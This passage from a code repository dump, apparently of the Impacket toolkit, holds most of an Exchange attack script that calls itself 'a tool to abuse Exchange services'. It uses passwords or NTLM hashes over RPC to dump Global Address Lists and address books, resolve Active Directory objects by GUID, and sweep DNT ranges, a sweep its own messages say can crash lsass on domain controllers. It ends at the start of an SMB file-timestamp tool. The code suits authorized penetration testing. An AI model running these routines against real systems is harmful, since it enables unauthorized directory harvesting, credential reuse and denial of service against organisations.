0x3a1c001f, # mobile\n 0x3a1b101f, # otherTelephone\n 0x3a16001f, # company\n 0x3a18001f, # department\n 0x3a17001f, # title\n 0x3a11001f, # sn\n 0x3a0a001f, # initials\n 0x3a06001f, # givenName\n\n # Attributes of Types\n 0x0ffe0003, # PR_OBJECT_TYPE\n 0x39000003, # PR_DISPLAY_TYPE\n 0x80bd0003, # instanceType\n\n # Exchange Extension Attributes\n 0x802d001F, # extensionAttribute1\n 0x802e001F, # extensionAttribute2\n 0x802f001F, # extensionAttribute3\n 0x8030001F, # extensionAttribute4\n 0x8031001F, # extensionAttribute5\n 0x8032001F, # extensionAttribute6\n 0x8033001F, # extensionAttribute7\n 0x8034001F, # extensionAttribute8\n 0x8035001F, # extensionAttribute9\n 0x8036001F, # extensionAttribute10\n 0x8c57001F, # extensionAttribute11\n 0x8c58001F, # extensionAttribute12\n 0x8c59001F, # extensionAttribute13\n 0x8c60001F, # extensionAttribute14\n 0x8c61001F, # extensionAttribute15\n\n # 0x8c9e0102, # thumbnailPhoto, large\n\n # Configuration\n 0x81b6101e, # protocolSettings\n 0x8c9f001e, # msExchUserCulture\n 0x8c730102, # msExchMailboxGuid\n 0x8c96101e, # msExchResourceAddressLists, exists only for Exchange Organization object\n 0x8c750102, # msExchMasterAccountSid\n 0x8cb5000b, # msExchEnableModeration\n 0x8cb30003, # msExchGroupJoinRestriction\n 0x8ce20003, # msExchGroupMemberCount\n\n # Useful when lookuping DNTs\n 0x813b101e, # subRefs\n 0x8170101e, # networkAddress\n 0x8011001e, # targetAddress\n 0x8175101e, # url\n\n # Useful for distinguishing accounts\n 0x8c6a1102, # userCertificate\n\n # Assigned MId\n 0x0ff60102, # PR_INSTANCE_KEY\n ]\n\n # MS-OXNSPI\n # 2.1 Transport\n # For the network protocol sequence RPC over HTTPS,\n # this protocol MUST use the well-known endpoint 6004.\n DEFAULT_STRING_BINDING = 'ncacn_http:%s[6004,RpcProxy=%s:443]'\n\n def __init__(self):\n Exchanger.__init__(self)\n\n self.__handler = None\n\n self.htable = {}\n self.anyExistingContainerID = -1\n\n self.props = list()\n self.stat = nspi.STAT()\n self.stat['CodePage'] = nspi.CP_TELETEX\n\n def connect_rpc(self, remoteName, rpcHostname=''):\n self._stringbinding = self.DEFAULT_STRING_BINDING % (rpcHostname, remoteName)\n logging.debug('StringBinding %s' % self._stringbinding)\n\n self._rpctransport = transport.DCERPCTransportFactory(self._stringbinding)\n self._rpctransport.set_credentials(self._username, self._password, self._domain,\n self._lmhash, self._nthash)\n\n self.__dce = self._rpctransport.get_dce_rpc()\n\n # MS-OXNSPI\n # 3.1.4 Message Processing Events and Sequencing Rules\n #\n # This protocol MUST indicate to the RPC runtime that it\n # is to perform a strict Network Data Representation (NDR) data\n # consistency check at target level 6.0, as specified in [MS-RPCE].\n self.__dce.set_credentials(self._username, self._password, self._domain,\n self._lmhash, self._nthash)\n if options.basic:\n self._rpctransport.set_auth_type(AUTH_BASIC)\n\n self.__dce.set_auth_level(6)\n\n self.__dce.connect()\n self.__dce.bind(nspi.MSRPC_UUID_NSPI)\n\n resp = nspi.hNspiBind(self.__dce, self.stat)\n self.__handler = resp['contextHandle']\n\n def update_stat(self, table_MId):\n stat = nspi.STAT()\n stat['CodePage'] = CP_TELETEX\n stat['ContainerID'] = NSPIAttacks._int_to_dword(table_MId)\n\n resp = nspi.hNspiUpdateStat(self.__dce, self.__handler, stat)\n self.stat = resp['pStat']\n\n def load_htable(self):\n resp = nspi.hNspiGetSpecialTable(self.__dce, self.__handler)\n resp_simpl = nspi.simplifyPropertyRowSet(resp['ppRows'])\n\n self._parse_and_set_htable(resp_simpl)\n\n def load_htable_stat(self):\n for MId in self.htable:\n self.update_stat(MId)\n self.htable[MId]['count'] = self.stat['TotalRecs']\n self.htable[MId]['start_mid'] = self.stat['CurrentRec']\n\n def load_htable_containerid(self):\n if self.anyExistingContainerID != -1:\n return\n\n if self.htable == {}:\n self.load_htable()\n\n for MId in self.htable:\n self.update_stat(MId)\n\n if self.stat['CurrentRec'] > 0:\n self.anyExistingContainerID = NSPIAttacks._int_to_dword(MId)\n return\n\n def _parse_and_set_htable(self, htable):\n self.htable = {}\n\n for ab in htable:\n MId = ab[PR_EMS_AB_CONTAINERID]\n\n self.htable[MId] = {}\n self.htable[MId]['flags'] = ab[PR_CONTAINER_FLAGS]\n\n if MId == 0:\n self.htable[0]['name'] = \"Default Global Address List\"\n else:\n self.htable[MId]['name'] = ab[PR_DISPLAY_NAME]\n self.htable[MId]['guid'] = get_guid_from_dn(ab[PR_ENTRYID])\n\n if PR_EMS_AB_PARENT_ENTRYID in ab:\n self.htable[MId]['parent_guid'] = get_guid_from_dn(ab[PR_EMS_AB_PARENT_ENTRYID])\n\n if PR_DEPTH in ab:\n self.htable[MId]['depth'] = ab[PR_DEPTH]\n else:\n self.htable[MId]['depth'] = 0\n\n if PR_EMS_AB_IS_MASTER in ab:\n self.htable[MId]['is_master'] = ab[PR_EMS_AB_IS_MASTER]\n else:\n self.htable[MId]['is_master'] = 0\n\n @staticmethod\n def _int_to_dword(number):\n if number > 0:\n return number\n else:\n return (number + (1 << 32)) % (1 << 32)\n\n def print_htable(self, parent_guid=None):\n MIds_print = []\n\n for MId in self.htable:\n if parent_guid == None and 'parent_guid' not in self.htable[MId]:\n MIds_print.append(MId)\n elif parent_guid != None and 'parent_guid' in self.htable[MId] and self.htable[MId]['parent_guid'] == parent_guid:\n MIds_print.append(MId)\n\n for MId in MIds_print:\n ab = self.htable[MId]\n ab['printed'] = True\n indent = ' ' * ab['depth']\n\n # Table name\n print(\"%s%s\" % (indent, ab['name']))\n\n # Count\n if 'count' in ab:\n print(\"%sTotalRecs: %d\" % (indent, ab['count']))\n\n # Table params\n if MId != 0:\n guid = uuid.bin_to_string(ab['guid']).lower()\n print(\"%sGuid: %s\" % (indent, guid))\n else:\n print(\"%sGuid: None\" % indent)\n\n if ab['is_master'] != 0:\n print(\"%sPR_EMS_AB_IS_MASTER attribute is set!\" % indent)\n\n if self._extended_output:\n dword = NSPIAttacks._int_to_dword(MId)\n print(\"%sAssigned MId: 0x%.08X (%d)\" % (indent, dword, MId))\n\n if 'start_mid' in ab:\n dword = NSPIAttacks._int_to_dword(ab['start_mid'])\n if dword == 2:\n print(\"%sAssigned first record MId: 0x00000002 (MID_END_OF_TABLE)\" % indent)\n else:\n print(\"%sAssigned first record MId: 0x%.08X (%d)\" % (indent, dword, ab['start_mid']))\n\n flags = parse_bitmask(PR_CONTAINER_FLAGS_VALUES, ab['flags'])\n print(\"%sFlags: %s\" % (indent, flags))\n\n print()\n\n if MId != 0:\n self.print_htable(parent_guid=ab['guid'])\n\n if parent_guid == None:\n for MId in self.htable:\n if self.htable[MId]['printed'] == False:\n print(\"Found parentless object!\")\n print(\"Name: %s\" % self.htable[MId]['name'])\n print(\"Guid: %s\" % uuid.bin_to_string(self.htable[MId]['guid']).lower())\n print(\"Parent guid: %s\" % uuid.bin_to_string(self.htable[MId]['parent_guid']).lower())\n dword = NSPIAttacks._int_to_dword(MId) if MId < 0 else MId\n print(\"Assigned MId: 0x%.08X (%d)\" % (dword, MId))\n flags = parse_bitmask(PR_CONTAINER_FLAGS_VALUES, self.htable[MId]['flags'])\n print(\"Flags: %s\" % flags)\n if self.htable[MId]['is_master'] != 0:\n print(\"%sPR_EMS_AB_IS_MASTER attribute is set!\" % indent)\n print()\n\n def disconnect(self):\n nspi.hNspiUnbind(self.__dce, self.__handler)\n self.__dce.disconnect()\n\n def print_row(self, row_simpl, delimiter=None):\n empty = True\n\n for aulPropTag in row_simpl:\n PropertyId = aulPropTag >> 16\n PropertyType = aulPropTag & 0xFFFF\n\n # Error, e.g. MAPI_E_NOT_FOUND\n if PropertyType == 0x000A:\n continue\n\n # PtypEmbeddedTable\n if PropertyType == 0x000D:\n continue\n\n empty = False\n\n if PropertyId in MAPI_PROPERTIES:\n property_name = MAPI_PROPERTIES[PropertyId][1]\n if property_name is None:\n property_name = MAPI_PROPERTIES[PropertyId][5]\n if property_name is None:\n property_name = MAPI_PROPERTIES[PropertyId][6]\n else:\n property_name = \"0x%.8x\" % aulPropTag\n\n if self._extended_output:\n property_name = \"%s, 0x%.8x\" % (property_name, aulPropTag)\n\n if isinstance(row_simpl[aulPropTag], ExchBinaryObject):\n self.print(\"%s: %s\" % (property_name, self._encode_binary(row_simpl[aulPropTag])))\n else:\n self.print(\"%s: %s\" % (property_name, row_simpl[aulPropTag]))\n\n if empty == False and delimiter != None:\n self.print(delimiter)\n\n def load_props(self):\n if len(self.props) > 0:\n return\n\n resp = nspi.hNspiQueryColumns(self.__dce, self.__handler)\n\n for prop in resp['ppColumns']['aulPropTag']:\n PropertyTag = prop['Data']\n PropertyType = PropertyTag & 0xFFFF\n\n if PropertyType == 0x000D:\n # Skipping PtypEmbeddedTable to reduce traffic\n continue\n\n self.props.append(PropertyTag)\n\n def req_print_table_rows(self, table_MId=None, attrs=[], count=50, eTable=None, onlyCheck=False):\n printOnlyGUIDs = False\n useAsExplicitTable = False\n\n if self.anyExistingContainerID == -1:\n self.load_htable_containerid()\n\n if table_MId == None and eTable == None:\n raise Exception(\"Wrong arguments!\")\n elif table_MId != None and eTable != None:\n raise Exception(\"Wrong arguments!\")\n elif table_MId != None:\n # Let's call NspiUpdateStat\n # It's important when the given MId is taken from the hierarchy table,\n # especially in Multi-Tenant environments\n self.update_stat(table_MId)\n\n # Table end reached\n if self.stat['CurrentRec'] == nspi.MID_END_OF_TABLE:\n # Returning False to support onlyCheck\n return False\n else:\n # eTable != None\n useAsExplicitTable = True\n\n if attrs == self.PROPS_GUID:\n # GUIDS\n firstReqProps = self.PROPS_GUID\n printOnlyGUIDs = True\n elif attrs == self.PROPS_MINUMAL:\n # MINIMAL\n firstReqProps = self.PROPS_MINUMAL\n elif attrs == []:\n # FULL\n # Requesting a list of all the properties that the server knows\n if self.props == []:\n self.load_props()\n attrs = self.props\n\n # To avoid MAPI_E_NOT_ENOUGH_RESOURCES error we request MIds,\n # and then use them as an Explicit Table\n firstReqProps = [PR_INSTANCE_KEY]\n useAsExplicitTable = True\n else:\n # EXTENDED and custom\n #\n # To avoid MAPI_E_NOT_ENOUGH_RESOURCES error we request MIds,\n # and then use them as an Explicit Table\n firstReqProps = [PR_INSTANCE_KEY]\n useAsExplicitTable = True\n\n if onlyCheck:\n attrs = self.PROPS_GUID\n firstReqProps = self.PROPS_GUID\n useAsExplicitTable = True\n\n while True:\n if eTable == None:\n resp = nspi.hNspiQueryRows(self.__dce, self.__handler,\n pStat=self.stat, Count=count, pPropTags=firstReqProps)\n self.stat = resp['pStat']\n\n try:\n # Addressing to PropertyRowSet_r must be inside try / except,\n # as if the server returned a wrong result, it can be in\n # multiple of forms, and we cannot easily determine it\n # before parsing\n resp_rows = nspi.simplifyPropertyRowSet(resp['ppRows'])\n except Exception as e:\n resp.dumpRaw()\n logging.error(str(e))\n raise Exception(\"NspiQueryRows returned wrong result\")\n\n if onlyCheck:\n if len(resp_rows) == 0:\n return False\n\n for row in resp_rows:\n # PropertyId = 0x8C6D (objectGUID)\n # PropertyType = 0x000A (error)\n if 0x8C6D000A not in row:\n return True\n\n return False\n\n if useAsExplicitTable:\n if eTable == None:\n eTableInt = []\n for row in resp_rows:\n eTableInt.append(row[PR_INSTANCE_KEY])\n else:\n eTableInt = eTable\n\n resp = nspi.hNspiQueryRows(self.__dce, self.__handler,\n ContainerID=self.anyExistingContainerID, Count=count, pPropTags=attrs, lpETable=eTableInt)\n\n try:\n # Addressing to PropertyRowSet_r must be inside try / except,\n # as if the server returned a wrong result, it can be in\n # multiple of forms, and we cannot easily determine it\n # before parsing\n resp_rows = nspi.simplifyPropertyRowSet(resp['ppRows'])\n except Exception as e:\n resp.dumpRaw()\n logging.error(str(e))\n raise Exception(\"NspiQueryRows returned wrong result while processing explicit table\")\n\n if onlyCheck:\n if len(resp_rows) == 0:\n return False\n\n for row in resp_rows:\n # PropertyId = 0x8C6D (objectGUID)\n # PropertyType = 0x000A (error)\n if 0x8C6D000A not in row:\n return True\n\n return False\n\n if printOnlyGUIDs:\n for row in resp_rows:\n if PR_EMS_AB_OBJECT_GUID in row:\n objectGuid = row[PR_EMS_AB_OBJECT_GUID]\n self.print(objectGuid)\n else:\n # Empty row (wrong MId)\n pass\n else:\n for row in resp_rows:\n self.print_row(row, DELIMITER)\n\n # When the caller specified eTable it's always one NspiQueryRows call\n if eTable != None:\n break\n\n # Table end reached\n # It also MUST be checked after NspiUpdateStat\n if self.stat['CurrentRec'] == nspi.MID_END_OF_TABLE:\n break\n\n # This should not happen\n if len(resp_rows) == 0:\n break\n\n def req_print_guid(self, guid=None, attrs=[], count=50, guidFile=None):\n if guid == None and guidFile == None:\n raise Exception(\"Wrong arguments!\")\n elif guid != None and guidFile != None:\n raise Exception(\"Wrong arguments!\")\n\n if attrs == []:\n # Requesting a list of all the properties that the server knows\n if self.props == []:\n self.load_props()\n attrs = self.props\n\n if guid:\n printedLines = self._req_print_guid([guid], attrs)\n if printedLines == 0:\n raise Exception(\"Object with specified GUID not found!\")\n return\n\n fd = open(guidFile, 'r')\n line = fd.readline()\n\n while True:\n guidList = []\n # EOF\n if line == '':\n break\n\n # Reading N lines from the file\n for i in range(count):\n line = fd.readline()\n guid = line.strip()\n\n if guid == '' or line[0] == '#':\n continue\n\n guidList.append(guid)\n\n # Multiple empty lines or EOF\n if len(guidList) == 0:\n continue\n\n # Processing\n self._req_print_guid(guidList, attrs, DELIMITER)\n\n fd.close()\n\n def _req_print_guid(self, guidList, attrs, delimiter=None):\n legacyDNList = []\n\n for guid in guidList:\n legacyDNList.append(get_dn_from_guid(guid, minimize=True))\n\n resp = nspi.hNspiResolveNamesW(self.__dce, self.__handler, pPropTags=attrs, paStr=legacyDNList)\n\n try:\n # Addressing to PropertyRowSet_r must be inside try / except,\n # as if the server returned a wrong result, it can be in\n # multiple of forms, and we cannot easily determine it\n # before parsing\n if resp['ppRows']['cRows'] <= 0:\n return 0\n\n # Addressing to PropertyRowSet_r must be inside try / except,\n # as if the server returned a wrong result, it can be in\n # multiple of forms, and we cannot easily determine it\n # before parsing\n resp_rows = nspi.simplifyPropertyRowSet(resp['ppRows'])\n except Exception as e:\n resp.dumpRaw()\n logging.error(str(e))\n raise Exception(\"NspiResolveNamesW returned wrong result\")\n\n for row in resp_rows:\n self.print_row(row, delimiter)\n\n return resp['ppRows']['cRows']\n\n def req_print_dnt(self, start_dnt, stop_dnt, attrs=[], count=50, checkIfEmpty=False):\n if count <= 0 or start_dnt < 0 or stop_dnt < 0 or stop_dnt > 0xFFFFFFFF or start_dnt > 0xFFFFFFFF:\n raise Exception(\"Wrong arguments!\")\n\n if stop_dnt >= start_dnt:\n step = count\n rstep = 1\n else:\n step = -count\n rstep = -1\n\n stop_dnt += rstep\n dnt1 = start_dnt\n dnt2 = start_dnt + step\n\n while True:\n if step > 0 and dnt2 > stop_dnt:\n dnt2 = stop_dnt\n elif step < 0 and dnt2 < stop_dnt:\n dnt2 = stop_dnt\n\n self.print(\"# MIds %d-%d:\" % (dnt1, dnt2 - rstep))\n\n if checkIfEmpty:\n # Speed up the process by reducing the length of request/response\n exists = self.req_print_table_rows(attrs=attrs, eTable=range(dnt1, dnt2, rstep), onlyCheck=True)\n if exists:\n self.req_print_table_rows(attrs=attrs, eTable=range(dnt1, dnt2, rstep))\n else:\n self.req_print_table_rows(attrs=attrs, eTable=range(dnt1, dnt2, rstep))\n\n if dnt2 == stop_dnt:\n break\n\n dnt1 += step\n dnt2 += step\n\nclass ExchangerHelper:\n def __init__(self, domain, username, password, remoteName):\n self.__domain = domain\n self.__username = username\n self.__password = password\n self.__remoteName = remoteName\n\n self.exch = None\n\n def run(self, options):\n module = options.module.lower()\n submodule = options.submodule.lower()\n\n if module == 'nspi':\n # Checking options before connecting to the server\n self.nspi_check(submodule, options)\n self.nspi_run(submodule, options)\n else:\n raise Exception(\"%s module not found\" % module)\n\n def nspi_run(self, submodule, options):\n self.exch = NSPIAttacks()\n self.exch.set_credentials(self.__username, self.__password, self.__domain, options.hashes)\n self.exch.set_extended_output(options.debug)\n\n if submodule in ['dump-tables', 'guid-known', 'dnt-lookup'] and options.output_file != None:\n self.exch.set_output_file(options.output_file)\n\n self.exch.connect_rpc(self.__remoteName, options.rpc_hostname)\n\n if submodule == 'list-tables':\n self.nspi_list_tables(options)\n elif submodule == 'dump-tables':\n self.nspi_dump_tables(options)\n elif submodule == 'guid-known':\n self.nspi_guid_known(options)\n elif submodule == 'dnt-lookup':\n self.nspi_dnt_lookup(options)\n\n self.exch.disconnect()\n\n def nspi_check(self, submodule, options):\n if submodule == 'dump-tables' and options.name == None and options.guid == None:\n dump_tables.print_help()\n sys.exit(1)\n\n if submodule == 'dump-tables' and options.name != None and options.guid != None:\n logging.error(\"Specify only one of -name or -guid\")\n sys.exit(1)\n\n if submodule == 'guid-known' and options.guid == None and options.guid_file == None:\n guid_known.print_help()\n sys.exit(1)\n\n if submodule == 'guid-known' and options.guid != None and options.guid_file != None:\n logging.error(\"Specify only one of -guid or -guid-file\")\n sys.exit(1)\n\n def nspi_list_tables(self, options):\n self.exch.load_htable()\n\n if options.count:\n self.exch.load_htable_stat()\n\n self.exch.print_htable()\n\n def nspi_dump_tables(self, options):\n self.exch.set_output_type(options.output_type)\n\n if options.lookup_type == None or options.lookup_type == 'MINIMAL':\n propTags = NSPIAttacks.PROPS_MINUMAL\n elif options.lookup_type == 'EXTENDED':\n propTags = NSPIAttacks.PROPS_EXTENDED\n elif options.lookup_type == 'GUIDS':\n propTags = NSPIAttacks.PROPS_GUID\n else:\n # FULL\n propTags = []\n\n if options.name != None and options.name.lower() in ['gal', 'default global address list', 'global address list']:\n logging.info(\"Lookuping Global Address List\")\n table_MId = 0\n else:\n # 2.2.8\n # The client obtains Minimal Entry IDs for STAT ContainerID\n # from the server's address book hierarchy table\n #\n # We cannot convert the GUID to a MId via NspiDNToMId or similar operations because it\n # may not work in Multi-Tenant environments\n self.exch.load_htable()\n\n if options.guid != None:\n logging.info(\"Search for an address book with objectGUID = %s\" % options.guid)\n guid = uuid.string_to_bin(options.guid)\n name = None\n else:\n guid = None\n name = options.name\n\n table_MId = 0\n\n for MId in self.exch.htable:\n if MId == 0:\n # GAL\n continue\n\n if guid is not None:\n # -guid\n if self.exch.htable[MId]['guid'] == guid:\n logging.debug(\"MId %d is assigned for %s object\" % (MId, options.guid))\n logging.info(\"Lookuping %s\" % self.exch.htable[MId]['name'])\n table_MId = MId\n break\n else:\n # -name\n if self.exch.htable[MId]['name'] == name:\n guid = uuid.bin_to_string(self.exch.htable[MId]['guid'])\n logging.debug(\"MId %d is assigned for %s object\" % (MId, guid))\n logging.info(\"Lookuping address book with objectGUID = %s\" % guid)\n table_MId = MId\n break\n\n if table_MId == 0:\n logging.error(\"Specified address book not found!\")\n sys.exit(1)\n\n self.exch.req_print_table_rows(table_MId, propTags, options.rows_per_request)\n\n def nspi_guid_known(self, options):\n self.exch.set_output_type(options.output_type)\n\n if options.lookup_type == None or options.lookup_type == 'MINIMAL':\n propTags = NSPIAttacks.PROPS_MINUMAL\n elif options.lookup_type == 'EXTENDED':\n propTags = NSPIAttacks.PROPS_EXTENDED\n else:\n # FULL\n propTags = []\n\n if options.guid != None:\n self.exch.req_print_guid(options.guid, propTags)\n else:\n self.exch.req_print_guid(attrs=propTags, count=options.rows_per_request, guidFile=options.guid_file)\n\n def nspi_dnt_lookup(self, options):\n if options.lookup_type == None or options.lookup_type == 'EXTENDED':\n propTags = NSPIAttacks.PROPS_EXTENDED\n elif options.lookup_type == 'GUIDS':\n propTags = NSPIAttacks.PROPS_GUID\n else:\n # FULL\n propTags = []\n\n self.exch.req_print_dnt(options.start_dnt, options.stop_dnt, attrs=propTags,\n count=options.rows_per_request, checkIfEmpty=True)\n\n# Process command-line arguments.\nif __name__ == '__main__':\n # Explicitly changing the stdout encoding format\n if sys.stdout.encoding is None:\n # Output is redirected to a file\n sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n\n print(version.BANNER)\n\n class SmartFormatter(argparse.HelpFormatter):\n def _split_lines(self, text, width):\n if text.startswith('R|'):\n return text[2:].splitlines()\n else:\n return argparse.HelpFormatter._split_lines(self, text, width)\n\n def localized_arg(bytestring):\n unicode_string = bytestring.decode(sys.getfilesystemencoding())\n return unicode_string\n\n parser = argparse.ArgumentParser(add_help=True, description=\"A tool to abuse Exchange services\")\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG and EXTENDED output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n #parser.add_argument('-transport', choices=['RPC', 'MAPI'], nargs='?', default='RPC', help='Protocol to use')\n parser.add_argument('-rpc-hostname', action='store', help='A name of the server in GUID (preferred) '\n 'or NetBIOS name format (see description in the beggining of this file)')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n\n if PY37ORHIGHER:\n subparsers = parser.add_subparsers(help='A module name', dest='module', required=True)\n else:\n subparsers = parser.add_subparsers(help='A module name', dest='module')\n\n # NSPI module\n nspi_parser = subparsers.add_parser('nspi', help='Attack NSPI interface')\n\n # Attacks for NSPI protocol\n if PY37ORHIGHER:\n nspi_attacks = nspi_parser.add_subparsers(help='A submodule name', dest='submodule', required=True)\n else:\n nspi_attacks = nspi_parser.add_subparsers(help='A submodule name', dest='submodule')\n\n list_tables = nspi_attacks.add_parser('list-tables', help='List Address Books')\n list_tables.add_argument('-count', action='store_true', help='Request total number of records in each table')\n parser.add_argument('-basic', action='store_true', help='Authenticate with Basic Auth instead of NTLM')\n\n\n dump_tables = nspi_attacks.add_parser('dump-tables', formatter_class=SmartFormatter, help='Dump Address Books')\n dump_tables.add_argument('-lookup-type', choices=['MINIMAL', 'EXTENDED', 'FULL', 'GUIDS'], nargs='?', default='MINIMAL',\n help='R|Lookup type:\\n'\n ' MINIMAL - Request limited set of fields (default)\\n'\n ' EXTENDED - Request extended set of fields\\n'\n ' FULL - Request all fields for each row\\n'\n ' GUIDS - Request only GUIDs')\n dump_tables.add_argument('-rows-per-request', action='store', type=int, metavar=\"50\", default=50,\n help='Limit the number of rows per request')\n\n if PY3:\n dump_tables.add_argument('-name', action='store', help='Dump table with the specified name (inc. GAL)')\n else:\n dump_tables.add_argument('-name', action='store', help='Dump table with the specified name (inc. GAL)',\n type=localized_arg)\n\n dump_tables.add_argument('-guid', action='store', help='Dump table with the specified GUID')\n dump_tables.add_argument('-output-type', choices=['hex', 'base64'], nargs='?', default='hex',\n help='Output format for binary objects')\n dump_tables.add_argument('-output-file', action='store', help='Output filename')\n\n guid_known = nspi_attacks.add_parser('guid-known', formatter_class=SmartFormatter,\n help='Retrieve Active Directory objects by GUID / GUIDs')\n guid_known.add_argument('-guid', action='store', help='Dump object with the specified GUID')\n guid_known.add_argument('-guid-file', action='store', help='Dump objects using GUIDs from file')\n guid_known.add_argument('-lookup-type', choices=['MINIMAL', 'EXTENDED', 'FULL'], nargs='?', default='MINIMAL',\n help='R|Lookup type:\\n'\n ' MINIMAL - Request limited set of fields (default)\\n'\n ' EXTENDED - Request extended set of fields\\n'\n ' FULL - Request all fields for each row')\n guid_known.add_argument('-rows-per-request', action='store', type=int, metavar=\"50\", default=50,\n help='Limit the number of rows per request')\n guid_known.add_argument('-output-type', choices=['hex', 'base64'], nargs='?', default='hex',\n help='Output format for binary objects')\n guid_known.add_argument('-output-file', action='store', help='Output filename')\n\n dnt_lookup = nspi_attacks.add_parser('dnt-lookup', formatter_class=SmartFormatter, help='Lookup Distinguished Name Tags')\n dnt_lookup.add_argument('-lookup-type', choices=['EXTENDED', 'FULL', 'GUIDS'], nargs='?', default='EXTENDED',\n help='R|Lookup type:\\n'\n ' EXTENDED - Request extended set of fields (default)\\n'\n ' FULL - Request all fields for each row\\n'\n ' GUIDS - Request only GUIDs')\n dnt_lookup.add_argument('-rows-per-request', action='store', type=int, metavar=\"350\", default=350,\n help='Limit the number of rows per request')\n\n dnt_lookup.add_argument('-start-dnt', action='store', type=int, metavar=\"500000\", default=500000,\n help='A DNT to start from')\n dnt_lookup.add_argument('-stop-dnt', action='store', type=int, metavar=\"0\", default=0,\n help='A DNT to lookup to')\n\n dnt_lookup.add_argument('-output-type', choices=['hex', 'base64'], nargs='?', default='hex',\n help='Output format for binary objects')\n dnt_lookup.add_argument('-output-file', action='store', help='Output filename')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.rpc_hostname == '':\n # Preventing false feedback that empty hostname means something for Exchange\n # For autodetect -rpc-hostname should be skipped\n logging.error(\"-rpc-hostname cannot be empty\")\n sys.exit(1)\n\n if options.rpc_hostname is None:\n # Autodetect\n options.rpc_hostname = ''\n\n try:\n exchHelper = ExchangerHelper(domain, username, password, remoteName)\n exchHelper.run(options)\n except KeyboardInterrupt:\n logging.error(\"KeyboardInterrupt\")\n except Exception as e:\n #raise\n\n # This may contain UTF-8\n error_text = 'Protocol failed: %s' % e\n logging.critical(error_text)\n\n if 'NspiQueryRows returned wrong result' in error_text and \\\n options.submodule.lower() == 'dnt-lookup':\n logging.critical(\"Most likely ntdsai.dll in lsass.exe has crashed \"\n \"on a Domain Controller while processing a DNT which \"\n \"does not support to be requested via MS-NSPI. \"\n \"The DC is probably rebooting. \"\n \"This can happend in Multi-Tenant Environment. \"\n \"You can try to request different DNT range\")\n\n if 'Connection reset by peer' in error_text and \\\n exchHelper.exch._rpctransport.rts_ping_received == True and \\\n options.submodule.lower() == 'dnt-lookup':\n logging.critical(\"Most likely ntdsai.dll in lsass.exe has crashed \"\n \"on a Domain Controller while processing a DNT which \"\n \"does not support to be requested via MS-NSPI. \"\n \"The DC is probably rebooting. \"\n \"This can happend in Multi-Tenant Environment. \"\n \"You can try to request different DNT range\")\n\n # This usually happens when the target is RDG\n # Probably may happen for Exchange 2003 / 2007 / 2010\n if RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:\n logging.critical(\"This usually means the target has no ACL to connect to \"\n \"this endpoint using RPC Proxy\")\n logging.critical(\"Is the server a MS Exchange?\")\n if options.rpc_hostname == '':\n logging.critical(\"Try to specify -rpc-hostname (see description in the \"\n \"beggining of this file)\")\n else:\n logging.critical(\"Try to specify different -rpc-hostname, or enumerate \"\n \"endpoints via rpcmap.py / rpcdump.py\")\n\n # It's Exchange or Exchange behind TMG, but the RPC Server name is wrong\n if RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or \\\n RPC_PROXY_CONN_A1_404_ERR in error_text:\n if options.rpc_hostname == '':\n logging.critical(\"Cannot determine the right RPC Server name. Specify -rpc-hostname \"\n \"(see description in the beggining of this file)\")\n else:\n logging.critical(\"The specified RPC Server is incorrect. \"\n \"Try to specify different -rpc-hostname\")\n\n if RPC_PROXY_REMOTE_NAME_NEEDED_ERR in error_text:\n logging.critical(\"Specify -rpc-hostname (see description in the beggining of this file)\")\n\n # Wrong credentials\n if RPC_PROXY_HTTP_IN_DATA_401_ERR in error_text or RPC_PROXY_CONN_A1_401_ERR in error_text:\n logging.critical(\"Wrong credentials!\")\n\n # Show a reminder if Basic\n if RPC_PROXY_HTTP_IN_DATA_401_ERR in error_text or RPC_PROXY_CONN_A1_401_ERR in error_text:\n if exchHelper.exch._rpctransport.get_auth_type() == AUTH_BASIC and domain == '':\n logging.critical(\"The server requested Basic authentication which \"\n \"may require you to specify the domain. \"\n \"Your domain is empty!\")\n\n if RPC_PROXY_CONN_A1_401_ERR in error_text or \\\n RPC_PROXY_CONN_A1_404_ERR in error_text:\n logging.info(\"A proxy in front of the target server detected (may be WAF / SIEM)\")\n" }, { "path": "examples/filetime.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script can be used in order to query & modify file timestamps - utilizing pure SMB.\n# This is a PoC using my implementation of the `set_info` method in the `smb.py` file.\n# The script mimics the syntax & logic to both the linux `touch` and `stat` binaries.\n#\n# Author:\n# Raz Kissos (@covertivy)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import annotations\nimport sys\nimport argparse\nimport logging\nimport ntpath\nfrom typing import Tuple\nfrom collections import namedtuple\nfrom dataclasses import dataclass\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import version\nfrom impacket import smbconnection\nfrom impacket.nmb import SMB_SESSION_PORT\nfrom impacket.smb import (\n SMB_DIALECT, \n FILE_READ_ATTRIBUTES,\n FILE_WRITE_ATTRIBUTES,\n FILE_SHARE_READ,\n FILE_SHARE_WRITE,\n FILE_SHARE_DELETE,\n SMB_QUERY_FILE_BASIC_INFO,\n SMB_SET_FILE_BASIC_INFO,\n SMBQueryFileBasicInfo,\n SMBSetFileBasicInfo,\n)\nfrom impacket.smb3structs import (\n SMB2_FILE_BASIC_INFO,\n FILE_BASIC_INFORMATION,\n)\n\nimport argparse\nimport datetime\nfrom impacket import smbconnection\nfrom impacket.smb import SMB_DIALECT, FILE_READ_DATA, FILE_WRITE_DATA, FILE_WRITE_ATTRIBUTES, SMB_SET_FILE_BASIC_INFO, POSIXtoFT, 